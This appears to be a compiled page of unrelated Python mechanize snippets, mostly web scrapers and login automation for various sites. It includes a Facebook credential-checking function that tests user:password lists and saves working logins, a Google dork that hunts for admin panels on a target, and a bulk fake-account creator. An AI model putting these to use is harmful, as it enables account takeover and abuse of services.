def get_data ():

    html = scraperwiki.scrape (edd_url)
    process_ex_dividend_data  (html)
    
    br = Browser()
    br.set_handle_robots (False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.open (edd_url)    
    
    links = {}
    for link in br.links():
        if link.text in ['2', '3', '4']:
            links [link.text] = link.url
    for k, link in links.items():
        m = re.search (edd_pat, link)

        br = Browser()
        br.set_handle_robots (False)
        br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
        br.open (edd_url)    
        br.select_form(nr=0)
        br.set_all_readonly(False)
        br["__EVENTTARGET"] = m.group(1)
        br["__EVENTARGUMENT"] = ''
        for c in br.controls:
            if c.type == 'submit':
                c.disabled = True
        response = br.submit()
        process_ex_dividend_data (response.read())
Exemple #2
0
def get_browser():
    # Browser
    br = Browser()

    # Cookie Jar
    #cj = cookielib.LWPCookieJar()
    #br.set_cookiejar(cj)

    # Browser options
    br.set_handle_equiv(True)
    br.set_handle_gzip(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)

    # Follows refresh 0 but not hangs on refresh > 0
    #br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

    # Want debugging messages?
    #
    #br.set_debug_http(True)
    #br.set_debug_redirects(True)
    #br.set_debug_responses(True)

    # User-Agent (this is cheating, ok?)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    return br
def check(acs):
    for a in acs:
        try:
            a = a.rsplit()[0]
        except:
            pass
        try:
            if a:
                a = a.split(':')
                user = a[0]
                passw = a[1]
                br = Browser()
                br.set_handle_gzip(True)
                br.set_handle_robots(False)
                br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
                br.open('http://m.facebook.com/login.php')
                br.select_form(nr=0)
                br.form['email'] = user
                br.form['pass'] = passw
                br.submit()
                if 'm.facebook.com/login.php' in br.geturl() or 'checkpoint' in br.geturl() or 'to confirm your account with Facebook.' in br.response().read():
                            print "Could not login with " + str(a)

                else:
                    print "Logged in with " + user
                    opn = open(newfile, 'a')
                    opn.write(user + ":" + passw + '\n')
                    opn.close()

        except:
            print "Could not login with " + str(a)
Exemple #4
0
def begin_scraper():
  br = Browser()
  br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; rv:16:0) Gecko/20100101 Firefox/16.0')]
  br.set_handle_robots(False)
  br.open("https://wwws.mint.com/login.event")
  assert br.viewing_html()
  formcount=0
  for f in br.forms():
    if str(f.attrs["id"]) == "form-login":
      break
    formcount = formcount+1
  
  br.select_form(nr=formcount)

  br["username"] = "******" #Put your username here
  br["password"] = getpass()
  
  
  #import pdb; pdb.set_trace()
  # Submit the user credentials to login to mint 
  response = br.submit()
  response = br.follow_link(text="Transactions")
  links_to_transactions = br.links(text_regex="Export all \d+ transactions")
  link = ""
  for f in links_to_transactions:
    link = f

  response2 = br.follow_link(link)
  text_file = open("transactions.csv", "w")
  text_file.write(response2.read())
  text_file.close()
Exemple #5
0
def github_connect(path=""):
    """Connect to the website"""
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open('https://github.com/%s' % path)
    return br
Exemple #6
0
def login(url):
    # Use mechanize to get the set name URLs to scrape
    br = Browser()
    br.addheaders = [('User-Agent', ua)]
    br.open(url)

    # Select the form
    for form in br.forms():
        if form.attrs['id'] == 'loginFrm':
            br.form = form
            break

    br["email"] = EMAIL # replace with email
    br["password"] = PASSWORD # replace with password

    # Submit the form
    br.submit()

    for form in br.forms():
        if form.attrs['id'] == 'pop_report_form':
            br.form = form
            break

    br['sport_id'] = ['185223']
    br['set_name'] = "T206"
    br.submit(name="search")

    # Follow link to the correct set
    br.follow_link(url="http://www.beckett.com/grading/set_match/3518008")

    return br.response().read()
Exemple #7
0
def returnMnemonics(var):
    from mechanize import Browser
    from bs4 import BeautifulSoup
    # var = "abase"
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    url= 'http://mnemonicdictionary.com/?word=' + str(var)
    br.open(url)

    soup_mn = BeautifulSoup(br.response().read())

    # <div style="padding-top: 10px;">
    count_mn=0
    mnemonics=""
    for i in soup_mn.find_all('div',{'style':'padding-top: 10px;'}):

        soup2 = BeautifulSoup(str(i))
        for x in soup2.find_all('div', {'class':'row-fluid'}):
            soup3 = BeautifulSoup(str(x))

            for y in soup3.find_all('div', {'class':'span9'}):
                count = 0
                # print count_mn
                if count_mn==3:
                    break
                count_mn = count_mn+1
                if y is not None:
                    for z in y:
                        if count == 2:
                            # print z
                            mnemonics = mnemonics+z.strip().replace(','," ").replace('\n', '').replace(".","")+","
                        count = count+1
    return mnemonics
Exemple #8
0
    def get_browser(self):
        """
        Each FAUrl object stores it's own browser instance. On the first call
         it is created and if the username and password is set it will
         authenticate you.

        :return: mechanize.Browser instance.
        :raise: FAiler.FAError if FA is down. Time to F5!
        :raise: FAiler.FAAuth Your username and password failed
        """
        if self._br is None:
            br = Browser()
            br.set_handle_robots(False)
            br.set_handle_redirect(True)
            br.set_handle_referer(True)
            br.set_handle_equiv(True)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            if self._username is not None and self._password is not None:
                loginPage = 'https://www.furaffinity.net/login'
                try:
                    br.open(loginPage)
                except urllib2.HTTPError:
                    raise FAError("FA's down, F5 time.")
                br.form = br.global_form()
                br.form['name'] = self._username
                br.form['pass'] = self._password
                br.form.method = 'POST'
                br.submit()
                if br.geturl() == loginPage + '/?msg=1':
                    raise FAAuth('Username & Password Incorrect')
            self._br = br
        return self._br
def respond(permalink, text):
    br = Browser()
    user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1'
    br.addheaders = [('User-agent', user_agent)]

    soup = BeautifulSoup(br.open(permalink).read())

    urlopen = urllib2.urlopen
    Request = urllib2.Request
    encode = urllib.urlencode
    cj = cookielib.LWPCookieJar()

    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)

    root_comment = soup.find('form', attrs={'class': 'usertext border'})
    thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value']
    print 'thing_id', thing_id

    # LOG THE F**K IN
    req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.loads(req_open.read())

    modhash = read['json']['data']['modhash']

    # POST THE F*****G COMMENT
    req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.dumps(req_open.read())
def scrap_query(query, bang=None):

    r = ddg_query('imbd ' + query, bang=bang)
    if 'redirect' in dir(r) and 'primary' in dir(r.redirect):
        url = r.redirect.primary
    else:
        logger.info('Could not find imdb searchpage from DuckDuckGo bang')
        return None

    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\
                        WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\
                        Chrome/23.0.1271.97 Safari/537.11')]

    r = br.open(url)
    soup = BeautifulSoup(r)


    for link in soup.find_all('a'):
        href = link.get('href','')
        match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href)
        if match:
            imdb_id = check_imdb(match.group('number'))
            return imdb_id

    return None
Exemple #11
0
 def createbrowser(self):
     br = Browser()
     br.set_handle_gzip(True)
     br.set_handle_robots(False)
     br.set_handle_redirect(True)
     br.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1 like Mac OS X; en-US) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3')]
     return br
def scrape_info():
	browser = Browser()
	browser.set_handle_robots(False)
	browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

	parkIds = []
	for name in config['names']:
		browser.open("https://www.recreation.gov")
		browser.select_form(nr=0)
		browser['locationCriteria'] = name

		response = browser.submit()
		content = response.read()

		soup = BeautifulSoup(content, 'html.parser')
		scripts = soup.select('script')
		for script in scripts:
			if 'SuggestedPlaces' in str(script):
				jsonStr = str(script).strip('<script>var SuggestedPlaces = ').strip(';</script>')
				places = json.loads(jsonStr)
				query = urlparse.parse_qs(places[0]['value'])
				if 'parkId' in query:
					print('FOUND!: ' + unicode(query['parkId'][0]))
					parkIds.append(unicode(query['parkId'][0]))
				else:
					print('No results for ' + name + ': ' + places[0]['value'])

	pprint(parkIds)
Exemple #13
0
def searchTitle(rawtitle):
	br = Browser()
	# Ignore robots.txt
	br.set_handle_robots( False )
	# Google demands a user-agent that isn't a robot
	br.addheaders = [('User-agent', 'Firefox')]
	
	br.open( "http://www.google.com " )
	br.select_form( 'f' )
	s='imdb'+' + '+' '.join(re.compile('[\.]').split(rawtitle))
	br.form[ 'q' ] = s
	br.submit()

	resp = None
	for link in br.links():
		siteMatch = re.compile( 'www.imdb.com/title/tt[0-9]*/$' ).search( link.url )
		if siteMatch:
		    resp = br.follow_link( link )
		    print link.url
		    break

	soup = BeautifulSoup(resp.get_data())
	
	title = re.sub(' - IMDb','',soup.find('title').string)
	title = re.sub('\([0-9]*\)','',title)
	
	return title
def generateSentence(var):
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    url= 'http://www.oxforddictionaries.com/definition/english/' + str(var)
    # url= 'https://www.google.co.in/search?q=define+utilitarian'
    try:
        br.open(url)
    except:
        print "what word is this, man? " + var
        return
    soup = BeautifulSoup(br.response().read())
    sentence=""
    counter=0
    for i in soup.find_all('ul',{'class':'sentence_dictionary'}):
        if i is not None:
            soup2 = BeautifulSoup(str(i))
            for j in soup2.find_all('li',{'class':'sentence'}):
                if j is not None:
                    sentence = sentence + str(counter+1)+") "+j.string.replace(',',' ').strip()+"\n"
                    counter+=1
                    if counter == 2:
                        return sentence
    return sentence
def process(time):
    br = Browser()
    # Ignore robots.txt
    br.set_handle_robots( False )
    # Google demands a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("http://heasarc.gsfc.nasa.gov/cgi-bin/Tools/xTime/xTime.pl")

    br.select_form("form")

    br["time_in_i"] = time # Enter your time in here in the format "2015-06-27 04:23:23.68"

    response=br.submit()

    html=response.read()
    soup = BeautifulSoup(html)


    table =soup.find("table", border=5)

    g = table.findAll('tr')
    row= g[7] #Select the correct row

    cols = row.findAll('td')
    value = cols[1].string #This is the MET time

    return value
def testPx(px):
  B=Browser()
  B.addheaders = [('User-agent', userAgents[randint(0,len(userAgents)-1)])]
  B.set_proxies(px)
  try:
    B.open('http://graphicriver.net/',timeout=5)
    pxQ.put(px)
    print(px['http']+"  ok")
    
    B.open('http://graphicriver.net/category/all',timeout=5)
  except:
    print(px['http']+"  error")
  page = pageQ.get()
  try:  
#    pass
#  finally:
    count=0
    while(count<5):
      O = B.open('http://graphicriver.net/category/all?page='+str(page),timeout=8)
      turls = lxml.html.document_fromstring(O.get_data()).xpath('//div[@class="item-info"]/h3/a/@href')
      for url in turls:
        urlsQ.put(url)
      print(str(page)+" got")  
      pageDoneQ.put(page)
      page = pageQ.get()
      count+=1
  except:  
    pageQ.put(page)
    print(str(page)+" error")
Exemple #17
0
def login_url(
                url,
                login,
                passwd,
                form_nomber,
                login_name,
                paswd_name,
                submit_nomber
            ):
    br = Browser(); showMessage('Создаю интерфейс браузера')
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.open(url); showMessage('Загружаю сайт и произвожу вход')
    br.select_form(nr = form_nomber)
    br[login_name] = login
    br[paswd_name] = passwd

    res = br.submit(nr = submit_nomber)
    content = res.read()
    #определить число страниц
    maxPage = int(max_page(content)); showMessage('Определяю количество страниц и перехожу на последнюю')
    curPage = 84
    while curPage < maxPage:
        res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
        curPage = maxPage
        maxPage = int(max_page(content))
        content = res.read()
    #парсинг ключей
    if get_all_keys(content):
        webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) # Вернет True и откроет вкладку
def getRandomXKCDComic(urlBase):
    br = Browser()
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9')]
    br.set_handle_robots(False) 


    #XKCD Comics are enumerated in the following type by URL: http://www.xkcd.com/1, http://www.xkcd.com/2, ..., http://www.xkcd.com/n
    upperBound = 1
    lowerBound = 1

    #Multiply by two until address no longer exists
    while True:
        link = urlBase + str(upperBound) + "/"
        try:
            response = br.open(link)
        except:
            break

        lowerBound = upperBound
        upperBound = upperBound * 2

    #Binary Search for last Comic
    while True:
        pivot = (upperBound + lowerBound)/2
        link = urlBase + str(pivot) + "/"

        if lowerBound == upperBound or pivot == lowerBound:
            randomComicID = random.randint(1, pivot)
            randPageLink = urlBase + str(randomComicID) + "/"
            return br.open(randPageLink)
        try:
            response = br.open(link)
            lowerBound = pivot
        except:
            upperBound = pivot
Exemple #19
0
def get_machines(start,num_pages):
    mech = Browser()
    mech.set_handle_robots(False)
    mech.set_handle_equiv(False) 
    mech.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    machines = []
    try:
        page_num = 0
        for page_num in range(start,num_pages+1):
            print("page %d" % (page_num))
            url = "http://www.pinpedia.com/machine?page=%d" % page_num
            html_page = mech.open(url)
            html = html_page.read()
            machines += parse_page(html)
            time.sleep(0.1)
    except Exception as e:
        print e
        print("finished at page %s" % page_num)

    print("storing machines to machines.txt")

    with open('machines.txt','w') as fh:
        for machine in machines:
            fh.write(machine + "\n")
Exemple #20
0
	def google(self):
		print("\n\t[!] Searching on Google...\n")

		if self.dork == None:
			query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)"
		else:
			query = "".join(self.dork)
			query = query.strip("'")

		print("[DORK] >> " + query)

		try:
			query = query.replace(" ", "+")
			req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
			br = Browser()
			br.set_handle_robots(False)
			br.addheaders = [("User-agent", "chrome")]
			html = br.open(req).read() 
			soup = BeautifulSoup(html, "html5lib")

			with open("./output/google-%s.txt" % self.target[8:], "w") as log:
				for results in soup.findAll(attrs={"class":"g"}):
					for title in results.findAll("h3", attrs={"class":"r"}):
						t = title.text
						t = t.title()
					for link in results.findAll(attrs={"class":"s"}):
						l = link.cite.text
						print (t)
						print (l + '\n')
						log.write(str(l) + '\n')
		
		except Exception as e:
			print(e)
Exemple #21
0
def fetchFromBaidu():
    browser = Browser(history = NoHistory())
    browser.set_handle_robots(False)
    browser.addheaders = USER_AGENT
    page = browser.open(url)
    browser.select_form(name="f1")
    browser['word'] = "西洋美人"
    page = browser.submit()
    
    if 'Redirecting' in br.title():
        resp = br.follow_link(text_regex='click here')
    
    soup = bs(page.read())
    for image in soup.findAll("img"):
        try:
            print "Image: %(src)s" % image
            filename = image["src"].split("/")[-1]
            if fnmatch("*.jpg", filename) or fnmatch("*.jpeg", filename):
                parsed[2] = image["src"]
                outpath = os.path.join(out_folder, filename)
                if image["src"].lower().startswith("http"):
                    urlretrieve(image["src"], outpath)
                else:
                    urlretrieve(urlparse.urlunparse(parsed), outpath)
        except KeyError:
            continue
Exemple #22
0
    def __init__(self, config):
        self.login_url = 'http://%s.ogame.gameforge.com/' % config.country
        # http://s114-br.ogame.gameforge.com/game/index.php?page=overview
        self.index_url = 'http://s%s-%s.ogame.gameforge.com' % (config.universe, config.country) + '/game/index.php'
        headers = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) \
        AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36')]
        # Authentication data
        self.username = config.username
        self.password = config.password
        self.universe = config.universe
        self.country = config.country

        self.logger = logging.getLogger('ogame-bot')
        # Setting up the browser
        self.cj = cookielib.LWPCookieJar()

        br = Browser()
        br.set_cookiejar(self.cj)
        br.set_handle_robots(False)
        br.addheaders = headers
        # self.path = os.path.dirname(os.path.realpath(__file__))
        # name of the cookies file
        # self.cookies_file_name = os.path.join(self.path, 'cookies.tmp')
        self.cookies_file_name = 'cookies.tmp'
        super(AuthenticationProvider, self).__init__(br, config)
Exemple #23
0
def create():
    while 1:
        try:
            br = Browser()
            br.set_handle_robots(False)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.open('https://classic.netaddress.com/tpl/Subscribe/Step1?Locale=en&AdInfo=&Referer=http%3A%2F%2Fwww.netaddress.com%2F&T=1332304112864372')
            br.select_form(name='Step1')
            userid = randomname()
            br.form['usrUserId'] = userid
            pwd = randomname()
            br.form['newPasswd'] = pwd
            br.form['RPasswd'] = pwd
            br.form['usrFirst'] = randomname()
            br.form['usrLast'] = randomname()
            br.form['usrTimeZone'] = ['Africa/Abidjan']
            br.form['usrCn'] = ['AF']
            br.submit()
            print "Created " + userid + " with password " + pwd
            filo = open(filex, 'a')
            filo.write(userid + "@usa.net" + ":" + pwd + "\n")
            filo.close()

        except:
            print "error"
def get_google_news_by_url(url):

    # Construct browser object
    browser = Browser()
    ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36'
    browser.addheaders = [('User-Agent', ua), ('Accept', '*/*')]

    # Do not observe rules from robots.txt
    browser.set_handle_robots(False)

    # Create HTML document
    html = fromstring(browser.open(url).read())

    # get number of pages
    xpath_pages = '//a[@class="fl"]'
    page_num = len(html.xpath(xpath_pages)) + 1

    # get all pages url
    urls = generate_url_pages(url, page_num)
    print 'On ' + str(len(urls)) + ' pages:'

    df = [None] * page_num

    # iterate through all pages of this url
    for index, url in enumerate(urls):
        page_html = fromstring(browser.open(url).read())
        df[index] = get_google_news_in_page(page_html)

    return pd.concat(df, ignore_index=True)
def find_first_article():
    mech = Browser()
    cj = cookielib.LWPCookieJar()

    mech.set_handle_equiv(True)
    # mech.set_handle_gzip(True)
    mech.set_handle_redirect(True)
    mech.set_handle_referer(True)
    mech.set_handle_robots(False)
    # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    mech.addheaders = [
        (
            "User-agent",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
        )
    ]

    page = mech.open("https://bitcointalk.org/index.php?board=77.0")
    html = page.read()

    soup = BeautifulSoup(html)

    first_article_tag = soup.find("td", class_="windowbg")

    global startingpost
    startingpost = first_article_tag.span.a.get("href")
    print startingpost
Exemple #26
0
    def scrape(self):
        """
        Opens the html page and parses the pdf links.
        """
        browser = Browser()

        #-----------
        user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
        values1 = {'name' : 'Michael Foord',
                   'location' : 'Northampton',
                   'language' : 'Python' }
        headers = { 'User-Agent' : user_agent }
        browser.set_handle_redirect(True)
        browser.set_handle_referer(True)
        browser.set_handle_robots(False)
        browser.addheaders = [('User-Agent', 'Firefox')]
        #-------------

        browser.set_handle_robots(False)

        html = browser.open(self.site)

        lines = html.read().splitlines()

        for line in lines:
            urls = re.findall('<a href="?\'?([^"\'>]*)', line)
            for url in urls:
                if '.pdf"' in url:
                    self.pdf_urls.append(url)
def extract_article_url(posturl):
    mech = Browser()
    cj = cookielib.LWPCookieJar()

    mech.set_handle_equiv(True)
    # mech.set_handle_gzip(True)
    mech.set_handle_redirect(True)
    mech.set_handle_referer(True)
    mech.set_handle_robots(False)
    # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    mech.addheaders = [
        (
            "User-agent",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
        )
    ]

    page = mech.open(posturl)
    html = page.read()

    global soup
    soup = BeautifulSoup(html)

    global articleURL
    # print soup.prettify()

    for item in soup.find_all("div", class_="post"):
        for link in item.find_all("a"):
            string = link.get("href")
            if prog.match(string):
                # find the link that is to the article (link outside of bitcointalk.org forum)
                articleURL = link.get("href")
                return link.get("href")
    return "No article url"
Exemple #28
0
 def parseFeeds(self):
     mech = Browser()
     mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ]
     mech.set_handle_robots(False)
     for url in self.feedUrls:
     #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml"
         page = mech.open(url)
         html = page.read()
         soup = BeautifulStoneSoup(html)
         headlines = []
         descriptions = []
         i=0
         self.newsList = []
         for item in soup.findAll('item'):
             if (i > 20):
                 break
             date = item.find('pubdate')
             title = item.find('title')
             link = item.find('link')
             desc = item.find('description')
             if (len(title.contents) > 0):
                 title2 = title.contents[0]
             else:
                 title2 = 'None'
             self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \
                 desc.contents[0]))
             i+=1
         for story in self.newsList:
             headlines.append(story.title)
             descriptions.append(story.link)
             #story.display()
         self.headlineList.append(headlines)
         self.descList.append(descriptions)
     self.populateTopicList()
def google(query):
    print("\n\t[!] Searching on Google...\n")
    print("[QUERY] >> " + query)

    try:
        query = query.replace(" ", "+")
        req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [("User-agent", "chrome")]
        html = br.open(req).read()
        soup = BeautifulSoup(html, "html5lib")

        with open("./output/google-%s.txt" % query[8:], "w") as log:
            for results in soup.findAll(attrs={"class": "g"}):
                for title in results.findAll("h3", attrs={"class": "r"}):
                    t = title.text
                    t = t.title()
                    for link in results.findAll(attrs={"class": "s"}):
                        l = link.cite.text
                        print(t)
                        print(l + '\n')
                        log.write(str(l) + '\n')

    except Exception as e:
        print(e)
def cmdlogin(account,username,password,verbose):#login function for cmd tools
	#Actually this code applies only to otenet logins.
	testfoo=Browser()
	testfoo.set_handle_robots(False)
	login_page=acc_openlogin[str(account)]#find url
	foobar.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]#add eaders
	testfoo.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]#add headers
	try:
		if verbose:
			print "Opening url --> "+login_page
		foobar.open(login_page)#open url
	except:
		sys.exit("ERROR: Check your internet connection and try again...")
	if verbose:
		print "Connection established"
	if account=="otenet":
		foobar.select_form(name="loginform")
	elif account!="otenet":
		foobar.select_form(nr=0)
	if account == "voipbuster":
		foobar["login[username]"] = username
		foobar["login[password]"] = password
	elif account != "forthnet":
		foobar["username"] = username
		foobar["password"] = password
	else:
		foobar["Username"] = username
		foobar["Password"] = password
	try:
		if verbose:
			print "Verifying data..."
		foobar.submit()
	except:
		sys.exit("ERROR: Check your internet connection and try again...")
	time.sleep(2) #create a small delay
	ok=0
	testfoo=foobar
	repeat=0
	while repeat<=2:# Do 3 login attemps just in case there is a network error or smth
		try:
			time.sleep(1)
			leftcred=creditsleft(account,testfoo,verbose)
			break
		except:
			repeat=repeat+1# increase login attemps
			if repeat <= 3:
				if verbose:
					print "Retrying to login...("+str(repeat)+"/3)"
			else:# in case all of them failed
				sys.exit("Cannot login to "+account+". Invalid credentials or network error. Please try again :-)")
	if verbose:
		print "Logged in to "+account
		if account=="otenet" or account =="forthnet":
			print "SMS left: "+str(leftcred)
		elif account!="otenet" and account!="forthnet":
			print "Credits left: "+str(leftcred)
	if leftcred<="0.03":
		sys.exit("You cant send more messages today :-(")
	return leftcred
Exemple #31
0
def open_browser(url):
    '''
    INPUT: string containing url to open
    OUTPUT: browser object
    open the requested page and return a browser object
    '''
    br = Browser()  # Initialize browser object
    br.addheaders = [('User-agent', 'Firefox')]
    br.open(url)  # Retrieve the requested page
    br.select_form(nr=0)
    return br
Exemple #32
0
def get_data_urls(url):
    br = Browser()
    br.set_handle_robots( False )
    br.addheaders = [('User-agent', 'Firefox')]

    # Retrieve the Google home page, saving the response
    br.open(url)
    data_urls = []
    for link in br.links(url_regex="ssl.berkeley.edu"):
        data_urls.append(link.url)
    return data_urls
Exemple #33
0
 def no_js_get_source(self):
     br = Browser()
     br.set_handle_equiv(True)
     br.set_handle_referer(True)
     br.set_handle_robots(False)
     br.set_cookiejar(LWPCookieJar())
     br.addheaders = [('User-agent', USER_AGENT)]
     br.set_handle_refresh(_http.HTTPRefreshProcessor(), max_time=10)
     try:
         return br.open(self.url).read()
     except:
         exit('[!] Failed to fetch html source')
Exemple #34
0
 def getRoundPage(self, i):
     br = Browser()
     br.addheaders = [('User-agent', 'Firefox')]
     br.open(self.url)
     if i is not None:
         br.select_form(name="selectRound")
         br['selCount'] = [str(i)]
         br.submit()
     else:
         i = 0
     soup = BeautifulSoup(br.response().read(), features='html.parser')
     return soup
Exemple #35
0
def query_timetree(taxon_a, taxon_b):
    '''Mechanize is used to query the webinterface of timetree with two taxa
       and returns the result page after submiting the query form.'''
    br = Browser()
    br.addheaders = [('User-agent', 'Firefox')]
    br.set_handle_robots(False)
    br.open("http://timetree.org")
    br.select_form(name="query_frm")
    br['taxon_a'] = taxon_a
    br['taxon_b'] = taxon_b
    resp = br.submit()
    html = resp.get_data()
    return html
Exemple #36
0
def test():
    from mechanize import Browser
    USER_AGENT = "Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.8.1.9) Gecko/20071102 Pardus/2007 Firefox/2.0.0.9"
    br = Browser()
    br.addheaders = [("User-agent", USER_AGENT)]
    
    url = "https://login.yahoo.co.jp/config/login?.src=&.done=http%3A//www.yahoo.co.jp/"
    br.open(url)
    br.select_form("login_form")
    br['login'] = "******"
    br['passwd'] = "877877"
    response = br.submit()
    print response.read()
def ma_dv_hotline(cityName):
    br = Browser()
    br.set_handle_robots(False)  # ignore robots
    br.set_handle_refresh(False)  # can sometimes hang without this
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("https://findhelp.janedoe.org/find_help/search")
    br.select_form(id="searchprograms")
    br["city"] = [cityName]
    response = br.submit()
    cleanResponse = response.read().decode(
        "utf-8")  #get rid of bytes-type error and white space
    cleanResponse = cleanResponse.replace('<!DOCTYPE html>', '')
    return cleanResponse
def read_all_result_page_links_for(mainurl):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    br.open(mainurl)
    nice_links = [l for l in br.links() if 'company' in l.url]

    for link in nice_links:
        read_detail_page(link.url)
Exemple #39
0
 def _download_metadata():
     # does *NOT* work because of nasty javascript
     # probably need to use selenium
     from mechanize import Browser
     br = Browser()
     br.addheaders = [ ('User-agent', 'Firefox') ]
     br.set_handle_robots(False)
     br.open('http://mdgs.un.org/unsd/mdg/Metadata.aspx')
     br.follow_link(text='Flat View')
     assert br.viewing_html()
     out = br.response().read()
     # TODO: extract option list and then clean up
     return out
Exemple #40
0
def downloadAll(username, courseName):
    br = Browser()
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9'
    )]
    br.set_handle_robots(False)
    br.open('https://myvideosu.stanford.edu/oce/currentquarter.aspx')
    assert br.viewing_html()
    br.select_form(name='login')
    br['username'] = username
    br['password'] = getpass()

    # Open the course page for the title you're looking for
    print 'Logging in to myvideosu.stanford.edu...'
    response = br.submit()
    print 'Logged in, going to course link.'
    response = br.follow_link(text=courseName)

    # Build up a list of lectures.

    print 'Loading video links.'
    links = []
    for link in br.links(text='WMP'):
